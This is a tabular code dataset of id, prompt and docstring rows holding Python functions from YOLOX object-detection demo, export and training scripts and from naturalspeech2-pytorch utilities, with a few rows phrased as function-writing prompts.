id
int64 0
190k
| prompt
stringlengths 21
13.4M
| docstring
stringlengths 1
12k
⌀ |
---|---|---|
189,213 | import argparse
import megengine as mge
import numpy as np
from megengine import jit
from build import build_and_load
def make_parser():
parser = argparse.ArgumentParser("YOLOX Demo Dump")
parser.add_argument("-n", "--name", type=str, default="yolox-s", help="model name")
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt for eval")
parser.add_argument(
"--dump_path", default="model.mge", help="path to save the dumped model"
)
return parser | null |
189,214 | import argparse
import megengine as mge
import numpy as np
from megengine import jit
from build import build_and_load
def dump_static_graph(model, graph_name="model.mge"):
model.eval()
model.head.decode_in_inference = False
data = mge.Tensor(np.random.random((1, 3, 640, 640)))
@jit.trace(capture_as_const=True)
def pred_func(data):
outputs = model(data)
return outputs
pred_func(data)
pred_func.dump(
graph_name,
arg_names=["data"],
optimize_for_inference=True,
enable_fuse_conv_bias_nonlinearity=True,
) | null |
189,215 | import argparse
import os
import time
import cv2
import megengine as mge
import megengine.functional as F
from loguru import logger
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import vis
from yolox.data.data_augment import preproc as preprocess
from build import build_and_load
def make_parser():
parser = argparse.ArgumentParser("YOLOX Demo!")
parser.add_argument(
"demo", default="image", help="demo type, eg. image, video and webcam"
)
parser.add_argument("-n", "--name", type=str, default="yolox-s", help="model name")
parser.add_argument("--path", default="./test.png", help="path to images or video")
parser.add_argument("--camid", type=int, default=0, help="webcam demo camera id")
parser.add_argument(
"--save_result",
action="store_true",
help="whether to save the inference result of image/video",
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt for eval")
parser.add_argument("--conf", default=None, type=float, help="test conf")
parser.add_argument("--nms", default=None, type=float, help="test nms threshold")
parser.add_argument("--tsize", default=None, type=int, help="test img size")
return parser | null |
189,216 | import argparse
import os
import time
import cv2
import megengine as mge
import megengine.functional as F
from loguru import logger
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import vis
from yolox.data.data_augment import preproc as preprocess
from build import build_and_load
def postprocess(prediction, num_classes, conf_thre=0.7, nms_thre=0.45):
box_corner = F.zeros_like(prediction)
box_corner[:, :, 0] = prediction[:, :, 0] - prediction[:, :, 2] / 2
box_corner[:, :, 1] = prediction[:, :, 1] - prediction[:, :, 3] / 2
box_corner[:, :, 2] = prediction[:, :, 0] + prediction[:, :, 2] / 2
box_corner[:, :, 3] = prediction[:, :, 1] + prediction[:, :, 3] / 2
prediction[:, :, :4] = box_corner[:, :, :4]
output = [None for _ in range(len(prediction))]
for i, image_pred in enumerate(prediction):
# If none are remaining => process next image
if not image_pred.shape[0]:
continue
# Get score and class with highest confidence
class_conf = F.max(image_pred[:, 5: 5 + num_classes], 1, keepdims=True)
class_pred = F.argmax(image_pred[:, 5: 5 + num_classes], 1, keepdims=True)
class_conf_squeeze = F.squeeze(class_conf)
conf_mask = image_pred[:, 4] * class_conf_squeeze >= conf_thre
detections = F.concat((image_pred[:, :5], class_conf, class_pred), 1)
detections = detections[conf_mask]
if not detections.shape[0]:
continue
nms_out_index = F.vision.nms(
detections[:, :4], detections[:, 4] * detections[:, 5], nms_thre,
)
detections = detections[nms_out_index]
if output[i] is None:
output[i] = detections
else:
output[i] = F.concat((output[i], detections))
return output | null |
189,217 | import argparse
import os
import time
import cv2
import megengine as mge
import megengine.functional as F
from loguru import logger
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import vis
from yolox.data.data_augment import preproc as preprocess
from build import build_and_load
def get_image_list(path):
image_names = []
for maindir, subdir, file_name_list in os.walk(path):
for filename in file_name_list:
apath = os.path.join(maindir, filename)
ext = os.path.splitext(apath)[1]
if ext in IMAGE_EXT:
image_names.append(apath)
return image_names
def image_demo(predictor, vis_folder, path, current_time, save_result):
if os.path.isdir(path):
files = get_image_list(path)
else:
files = [path]
files.sort()
for image_name in files:
outputs, img_info = predictor.inference(image_name)
result_image = predictor.visual(outputs[0], img_info)
if save_result:
save_folder = os.path.join(
vis_folder, time.strftime("%Y_%m_%d_%H_%M_%S", current_time)
)
os.makedirs(save_folder, exist_ok=True)
save_file_name = os.path.join(save_folder, os.path.basename(image_name))
logger.info("Saving detection result in {}".format(save_file_name))
cv2.imwrite(save_file_name, result_image)
ch = cv2.waitKey(0)
if ch == 27 or ch == ord("q") or ch == ord("Q"):
break | null |
189,218 | import argparse
import os
import time
import cv2
import megengine as mge
import megengine.functional as F
from loguru import logger
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import vis
from yolox.data.data_augment import preproc as preprocess
from build import build_and_load
def imageflow_demo(predictor, vis_folder, current_time, args):
cap = cv2.VideoCapture(args.path if args.demo == "video" else args.camid)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH) # float
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT) # float
fps = cap.get(cv2.CAP_PROP_FPS)
save_folder = os.path.join(
vis_folder, time.strftime("%Y_%m_%d_%H_%M_%S", current_time)
)
os.makedirs(save_folder, exist_ok=True)
if args.demo == "video":
save_path = os.path.join(save_folder, os.path.basename(args.path))
else:
save_path = os.path.join(save_folder, "camera.mp4")
logger.info(f"video save_path is {save_path}")
vid_writer = cv2.VideoWriter(
save_path, cv2.VideoWriter_fourcc(*"mp4v"), fps, (int(width), int(height))
)
while True:
ret_val, frame = cap.read()
if ret_val:
outputs, img_info = predictor.inference(frame)
result_frame = predictor.visual(outputs[0], img_info)
if args.save_result:
vid_writer.write(result_frame)
ch = cv2.waitKey(1)
if ch == 27 or ch == ord("q") or ch == ord("Q"):
break
else:
break | null |
189,219 | import argparse
from collections import OrderedDict
import megengine as mge
import torch
def make_parser():
parser = argparse.ArgumentParser()
parser.add_argument("-w", "--weights", type=str, help="path of weight file")
parser.add_argument(
"-o",
"--output",
default="weight_mge.pkl",
type=str,
help="path of weight file",
)
return parser | null |
189,220 | import argparse
from collections import OrderedDict
import megengine as mge
import torch
def numpy_weights(weight_file):
torch_weights = torch.load(weight_file, map_location="cpu")
if "model" in torch_weights:
torch_weights = torch_weights["model"]
new_dict = OrderedDict()
for k, v in torch_weights.items():
new_dict[k] = v.cpu().numpy()
return new_dict
def map_weights(weight_file, output_file):
torch_weights = numpy_weights(weight_file)
new_dict = OrderedDict()
for k, v in torch_weights.items():
if "num_batches_tracked" in k:
print("drop: {}".format(k))
continue
if k.endswith("bias"):
print("bias key: {}".format(k))
v = v.reshape(1, -1, 1, 1)
new_dict[k] = v
elif "dconv" in k and "conv.weight" in k:
print("depthwise conv key: {}".format(k))
cout, cin, k1, k2 = v.shape
v = v.reshape(cout, 1, cin, k1, k2)
new_dict[k] = v
else:
new_dict[k] = v
mge.save(new_dict, output_file)
print("save weights to {}".format(output_file)) | null |
189,221 | import megengine.functional as F
import megengine.module as M
class SiLU(M.Module):
def forward(x):
def get_activation(name="silu"):
if name == "silu":
module = SiLU()
elif name == "relu":
module = M.ReLU()
elif name == "lrelu":
module = M.LeakyReLU(0.1)
else:
raise AttributeError("Unsupported act type: {}".format(name))
return module | null |
189,222 | import megengine.functional as F
import megengine.module as M
from .network_blocks import BaseConv, DWConv
The provided code snippet includes necessary dependencies for implementing the `meshgrid` function. Write a Python function `def meshgrid(x, y)` to solve the following problem:
meshgrid wrapper for megengine
Here is the function:
def meshgrid(x, y):
"""meshgrid wrapper for megengine"""
assert len(x.shape) == 1
assert len(y.shape) == 1
mesh_shape = (y.shape[0], x.shape[0])
mesh_x = F.broadcast_to(x, mesh_shape)
mesh_y = F.broadcast_to(y.reshape(-1, 1), mesh_shape)
return mesh_x, mesh_y | meshgrid wrapper for megengine |
189,223 | import megengine as mge
import megengine.module as M
from models.yolo_fpn import YOLOFPN
from models.yolo_head import YOLOXHead
from models.yolo_pafpn import YOLOPAFPN
from models.yolox import YOLOX
def build_yolox(name="yolox-s"):
num_classes = 80
# value meaning: depth, width
param_dict = {
"yolox-nano": (0.33, 0.25),
"yolox-tiny": (0.33, 0.375),
"yolox-s": (0.33, 0.50),
"yolox-m": (0.67, 0.75),
"yolox-l": (1.0, 1.0),
"yolox-x": (1.33, 1.25),
}
if name == "yolov3":
depth = 1.0
width = 1.0
backbone = YOLOFPN()
head = YOLOXHead(num_classes, width, in_channels=[128, 256, 512], act="lrelu")
model = YOLOX(backbone, head)
else:
assert name in param_dict
kwargs = {}
depth, width = param_dict[name]
if name == "yolox-nano":
kwargs["depthwise"] = True
in_channels = [256, 512, 1024]
backbone = YOLOPAFPN(depth, width, in_channels=in_channels, **kwargs)
head = YOLOXHead(num_classes, width, in_channels=in_channels, **kwargs)
model = YOLOX(backbone, head)
for m in model.modules():
if isinstance(m, M.BatchNorm2d):
m.eps = 1e-3
return model
def build_and_load(weight_file, name="yolox-s"):
model = build_yolox(name)
model_weights = mge.load(weight_file)
model.load_state_dict(model_weights, strict=False)
return model | null |
189,224 | import argparse
import os
import cv2
import numpy as np
import onnxruntime
from yolox.data.data_augment import preproc as preprocess
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import mkdir, multiclass_nms, demo_postprocess, vis
def make_parser():
parser = argparse.ArgumentParser("onnxruntime inference sample")
parser.add_argument(
"-m",
"--model",
type=str,
default="yolox.onnx",
help="Input your onnx model.",
)
parser.add_argument(
"-i",
"--image_path",
type=str,
default='test_image.png',
help="Path to your input image.",
)
parser.add_argument(
"-o",
"--output_dir",
type=str,
default='demo_output',
help="Path to your output directory.",
)
parser.add_argument(
"-s",
"--score_thr",
type=float,
default=0.3,
help="Score threshould to filter the result.",
)
parser.add_argument(
"--input_shape",
type=str,
default="640,640",
help="Specify an input shape for inference.",
)
return parser | null |
189,225 | import argparse
import random
import warnings
from loguru import logger
import torch
import torch.backends.cudnn as cudnn
from yolox.core import launch
from yolox.exp import Exp, check_exp_value, get_exp
from yolox.utils import configure_module, configure_nccl, configure_omp, get_num_devices
def make_parser():
parser = argparse.ArgumentParser("YOLOX train parser")
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
# distributed
parser.add_argument(
"--dist-backend", default="nccl", type=str, help="distributed backend"
)
parser.add_argument(
"--dist-url",
default=None,
type=str,
help="url used to set up distributed training",
)
parser.add_argument("-b", "--batch-size", type=int, default=64, help="batch size")
parser.add_argument(
"-d", "--devices", default=None, type=int, help="device for training"
)
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="plz input your experiment description file",
)
parser.add_argument(
"--resume", default=False, action="store_true", help="resume training"
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="checkpoint file")
parser.add_argument(
"-e",
"--start_epoch",
default=None,
type=int,
help="resume training start epoch",
)
parser.add_argument(
"--num_machines", default=1, type=int, help="num of node for training"
)
parser.add_argument(
"--machine_rank", default=0, type=int, help="node rank for multi-node training"
)
parser.add_argument(
"--fp16",
dest="fp16",
default=False,
action="store_true",
help="Adopting mix precision training.",
)
parser.add_argument(
"--cache",
type=str,
nargs="?",
const="ram",
help="Caching imgs to ram/disk for fast training.",
)
parser.add_argument(
"-o",
"--occupy",
dest="occupy",
default=False,
action="store_true",
help="occupy GPU memory first for training.",
)
parser.add_argument(
"-l",
"--logger",
type=str,
help="Logger to be used for metrics. \
Implemented loggers include `tensorboard` and `wandb`.",
default="tensorboard"
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
return parser | null |
189,226 | import argparse
import os
from loguru import logger
import torch
from torch import nn
from yolox.exp import get_exp
from yolox.models.network_blocks import SiLU
from yolox.utils import replace_module
def make_parser():
parser = argparse.ArgumentParser("YOLOX onnx deploy")
parser.add_argument(
"--output-name", type=str, default="yolox.onnx", help="output name of models"
)
parser.add_argument(
"--input", default="images", type=str, help="input node name of onnx model"
)
parser.add_argument(
"--output", default="output", type=str, help="output node name of onnx model"
)
parser.add_argument(
"-o", "--opset", default=11, type=int, help="onnx opset version"
)
parser.add_argument("--batch-size", type=int, default=1, help="batch size")
parser.add_argument(
"--dynamic", action="store_true", help="whether the input shape should be dynamic or not"
)
parser.add_argument("--no-onnxsim", action="store_true", help="use onnxsim or not")
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="experiment description file",
)
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt path")
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
parser.add_argument(
"--decode_in_inference",
action="store_true",
help="decode in inference or not"
)
return parser | null |
189,227 | import argparse
import os
from loguru import logger
import torch
from yolox.exp import get_exp
def make_parser():
parser = argparse.ArgumentParser("YOLOX torchscript deploy")
parser.add_argument(
"--output-name", type=str, default="yolox.torchscript.pt", help="output name of models"
)
parser.add_argument("--batch-size", type=int, default=1, help="batch size")
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="experiment description file",
)
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt path")
parser.add_argument(
"--decode_in_inference",
action="store_true",
help="decode in inference or not"
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
return parser | null |
189,228 | import argparse
import os
import shutil
from loguru import logger
import tensorrt as trt
import torch
from torch2trt import torch2trt
from yolox.exp import get_exp
def make_parser():
parser = argparse.ArgumentParser("YOLOX ncnn deploy")
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="please input your experiment description file",
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt path")
parser.add_argument(
"-w", '--workspace', type=int, default=32, help='max workspace size in detect'
)
parser.add_argument("-b", '--batch', type=int, default=1, help='max batch size in detect')
return parser | null |
189,229 | import argparse
import os
import time
from loguru import logger
import cv2
import torch
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.exp import get_exp
from yolox.utils import fuse_model, get_model_info, postprocess, vis
def make_parser():
parser = argparse.ArgumentParser("YOLOX Demo!")
parser.add_argument(
"demo", default="image", help="demo type, eg. image, video and webcam"
)
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
parser.add_argument(
"--path", default="./assets/dog.jpg", help="path to images or video"
)
parser.add_argument("--camid", type=int, default=0, help="webcam demo camera id")
parser.add_argument(
"--save_result",
action="store_true",
help="whether to save the inference result of image/video",
)
# exp file
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="please input your experiment description file",
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt for eval")
parser.add_argument(
"--device",
default="cpu",
type=str,
help="device to run our model, can either be cpu or gpu",
)
parser.add_argument("--conf", default=0.3, type=float, help="test conf")
parser.add_argument("--nms", default=0.3, type=float, help="test nms threshold")
parser.add_argument("--tsize", default=None, type=int, help="test img size")
parser.add_argument(
"--fp16",
dest="fp16",
default=False,
action="store_true",
help="Adopting mix precision evaluating.",
)
parser.add_argument(
"--legacy",
dest="legacy",
default=False,
action="store_true",
help="To be compatible with older versions",
)
parser.add_argument(
"--fuse",
dest="fuse",
default=False,
action="store_true",
help="Fuse conv and bn for testing.",
)
parser.add_argument(
"--trt",
dest="trt",
default=False,
action="store_true",
help="Using TensorRT model for testing.",
)
return parser | null |
189,230 | import argparse
import os
import time
from loguru import logger
import cv2
import torch
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.exp import get_exp
from yolox.utils import fuse_model, get_model_info, postprocess, vis
def get_image_list(path):
def image_demo(predictor, vis_folder, path, current_time, save_result):
if os.path.isdir(path):
files = get_image_list(path)
else:
files = [path]
files.sort()
for image_name in files:
outputs, img_info = predictor.inference(image_name)
result_image = predictor.visual(outputs[0], img_info, predictor.confthre)
if save_result:
save_folder = os.path.join(
vis_folder, time.strftime("%Y_%m_%d_%H_%M_%S", current_time)
)
os.makedirs(save_folder, exist_ok=True)
save_file_name = os.path.join(save_folder, os.path.basename(image_name))
logger.info("Saving detection result in {}".format(save_file_name))
cv2.imwrite(save_file_name, result_image)
ch = cv2.waitKey(0)
if ch == 27 or ch == ord("q") or ch == ord("Q"):
break | null |
189,231 | import argparse
import os
import time
from loguru import logger
import cv2
import torch
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.exp import get_exp
from yolox.utils import fuse_model, get_model_info, postprocess, vis
def imageflow_demo(predictor, vis_folder, current_time, args):
cap = cv2.VideoCapture(args.path if args.demo == "video" else args.camid)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH) # float
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT) # float
fps = cap.get(cv2.CAP_PROP_FPS)
if args.save_result:
save_folder = os.path.join(
vis_folder, time.strftime("%Y_%m_%d_%H_%M_%S", current_time)
)
os.makedirs(save_folder, exist_ok=True)
if args.demo == "video":
save_path = os.path.join(save_folder, os.path.basename(args.path))
else:
save_path = os.path.join(save_folder, "camera.mp4")
logger.info(f"video save_path is {save_path}")
vid_writer = cv2.VideoWriter(
save_path, cv2.VideoWriter_fourcc(*"mp4v"), fps, (int(width), int(height))
)
while True:
ret_val, frame = cap.read()
if ret_val:
outputs, img_info = predictor.inference(frame)
result_frame = predictor.visual(outputs[0], img_info, predictor.confthre)
if args.save_result:
vid_writer.write(result_frame)
else:
cv2.namedWindow("yolox", cv2.WINDOW_NORMAL)
cv2.imshow("yolox", result_frame)
ch = cv2.waitKey(1)
if ch == 27 or ch == ord("q") or ch == ord("Q"):
break
else:
break | null |
189,232 | import argparse
import os
import random
import warnings
from loguru import logger
import torch
import torch.backends.cudnn as cudnn
from torch.nn.parallel import DistributedDataParallel as DDP
from yolox.core import launch
from yolox.exp import get_exp
from yolox.utils import (
configure_module,
configure_nccl,
fuse_model,
get_local_rank,
get_model_info,
setup_logger
)
def make_parser():
parser = argparse.ArgumentParser("YOLOX Eval")
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
# distributed
parser.add_argument(
"--dist-backend", default="nccl", type=str, help="distributed backend"
)
parser.add_argument(
"--dist-url",
default=None,
type=str,
help="url used to set up distributed training",
)
parser.add_argument("-b", "--batch-size", type=int, default=64, help="batch size")
parser.add_argument(
"-d", "--devices", default=None, type=int, help="device for training"
)
parser.add_argument(
"--num_machines", default=1, type=int, help="num of node for training"
)
parser.add_argument(
"--machine_rank", default=0, type=int, help="node rank for multi-node training"
)
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="please input your experiment description file",
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt for eval")
parser.add_argument("--conf", default=None, type=float, help="test conf")
parser.add_argument("--nms", default=None, type=float, help="test nms threshold")
parser.add_argument("--tsize", default=None, type=int, help="test img size")
parser.add_argument("--seed", default=None, type=int, help="eval seed")
parser.add_argument(
"--fp16",
dest="fp16",
default=False,
action="store_true",
help="Adopting mix precision evaluating.",
)
parser.add_argument(
"--fuse",
dest="fuse",
default=False,
action="store_true",
help="Fuse conv and bn for testing.",
)
parser.add_argument(
"--trt",
dest="trt",
default=False,
action="store_true",
help="Using TensorRT model for testing.",
)
parser.add_argument(
"--legacy",
dest="legacy",
default=False,
action="store_true",
help="To be compatible with older versions",
)
parser.add_argument(
"--test",
dest="test",
default=False,
action="store_true",
help="Evaluating on test-dev set.",
)
parser.add_argument(
"--speed",
dest="speed",
default=False,
action="store_true",
help="speed test only.",
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
return parser | null |
189,233 | import os
import sys
import random
import time
import warnings
from loguru import logger
import torch
import torch.backends.cudnn as cudnn
from yolox.exp import Exp, get_exp
from yolox.core import Trainer
from yolox.utils import configure_module, configure_omp
from yolox.tools.train import make_parser
def assign_vis_parser():
parser = make_parser()
parser.add_argument("--max-batch", type=int, default=1, help="max batch of images to visualize")
return parser | null |
189,234 | from collections import namedtuple
from functools import wraps
from packaging import version
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
def once(fn):
called = False
@wraps(fn)
def inner(x):
nonlocal called
if called:
return
called = True
return fn(x)
return inner | null |
189,235 | from typing import Tuple
import numpy as np
import torch
from torch import nn, Tensor
from torch.nn import Module
import torch.nn.functional as F
from einops import rearrange, repeat
from beartype import beartype
from beartype.typing import Optional
def exists(val):
return val is not None
def pad_tensor(input, pad, value=0):
pad = [item for sublist in reversed(pad) for item in sublist] # Flatten the tuple
assert len(pad) // 2 == len(input.shape), 'Padding dimensions do not match input dimensions'
return F.pad(input, pad, mode='constant', value=value)
def maximum_path(value, mask, const=None):
device = value.device
dtype = value.dtype
if not exists(const):
const = torch.tensor(float('-inf')).to(device) # Patch for Sphinx complaint
value = value * mask
b, t_x, t_y = value.shape
direction = torch.zeros(value.shape, dtype=torch.int64, device=device)
v = torch.zeros((b, t_x), dtype=torch.float32, device=device)
x_range = torch.arange(t_x, dtype=torch.float32, device=device).view(1, -1)
for j in range(t_y):
v0 = pad_tensor(v, ((0, 0), (1, 0)), value = const)[:, :-1]
v1 = v
max_mask = v1 >= v0
v_max = torch.where(max_mask, v1, v0)
direction[:, :, j] = max_mask
index_mask = x_range <= j
v = torch.where(index_mask.view(1,-1), v_max + value[:, :, j], const)
direction = torch.where(mask.bool(), direction, 1)
path = torch.zeros(value.shape, dtype=torch.float32, device=device)
index = mask[:, :, 0].sum(1).long() - 1
index_range = torch.arange(b, device=device)
for j in reversed(range(t_y)):
path[index_range, index, j] = 1
index = index + direction[index_range, index, j] - 1
path = path * mask.float()
path = path.to(dtype=dtype)
return path | null |
189,236 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def exists(x):
return x is not None
def default(val, d):
if exists(val):
return val
return d() if callable(d) else d | null |
189,237 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def identity(t, *args, **kwargs):
return t | null |
189,238 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def has_int_squareroot(num):
return (math.sqrt(num) ** 2) == num | null |
189,239 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def pad_or_curtail_to_length(t, length):
if t.shape[-1] == length:
return t
if t.shape[-1] > length:
return t[..., :length]
return F.pad(t, (0, length - t.shape[-1])) | null |
189,240 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def prob_mask_like(shape, prob, device):
if prob == 1:
return torch.ones(shape, device = device, dtype = torch.bool)
elif prob == 0:
return torch.zeros(shape, device = device, dtype = torch.bool)
else:
return torch.zeros(shape, device = device).float().uniform_(0, 1) < prob | null |
189,241 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def generate_mask_from_repeats(repeats):
repeats = repeats.int()
device = repeats.device
lengths = repeats.sum(dim = -1)
max_length = lengths.amax().item()
cumsum = repeats.cumsum(dim = -1)
cumsum_exclusive = F.pad(cumsum, (1, -1), value = 0.)
seq = torch.arange(max_length, device = device)
seq = repeat(seq, '... j -> ... i j', i = repeats.shape[-1])
cumsum = rearrange(cumsum, '... i -> ... i 1')
cumsum_exclusive = rearrange(cumsum_exclusive, '... i -> ... i 1')
lengths = rearrange(lengths, 'b -> b 1 1')
mask = (seq < cumsum) & (seq >= cumsum_exclusive) & (seq < lengths)
return mask | null |
189,242 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
